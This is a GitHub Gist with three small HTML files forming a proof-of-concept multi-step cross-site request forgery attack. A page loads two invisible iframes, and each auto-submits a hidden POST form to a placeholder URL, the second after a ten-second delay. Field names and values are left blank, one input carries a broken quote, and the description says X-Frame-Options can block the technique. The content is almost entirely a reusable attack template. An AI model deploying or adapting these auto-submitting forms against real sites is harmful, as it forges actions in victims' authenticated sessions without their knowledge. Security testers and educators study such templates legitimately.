Last active
December 10, 2019 09:19
-
-
Save hoodoer/b99b8ccbf13e2bfd3cb4cee2ed8f9aec to your computer and use it in GitHub Desktop.
IFrames Based Multi-Step CSRF. X-Frame-Options can block this.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Hello! Two step CSRF coming up... | |
| <iframe src="step1.html" width="0" height="0"> | |
| </iframe> | |
| <iframe src="step2.html" width="0" height="0"> | |
| </iframe> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <form name="form1" method="POST" action="https://SOMEURL.com"> | |
| <input type="hidden" name="" value="" /> | |
| <input type="hidden" name=" value="" /> | |
| </form> | |
| <script type="text/javascript"> | |
| document.form1.submit(); | |
| </script> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <form name="form2" method="POST" action="https://SOMEOTHERURL.com"> | |
| <input type="hidden" name="" value="" /> | |
| <input type="hidden" name="" value="" /> | |
| </form> | |
| <script type="text/javascript"> | |
| window.setTimeout(doFormSubmit, 10000); | |
| function doFormSubmit() | |
| { | |
| document.form2.submit(); | |
| } | |
| </script> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment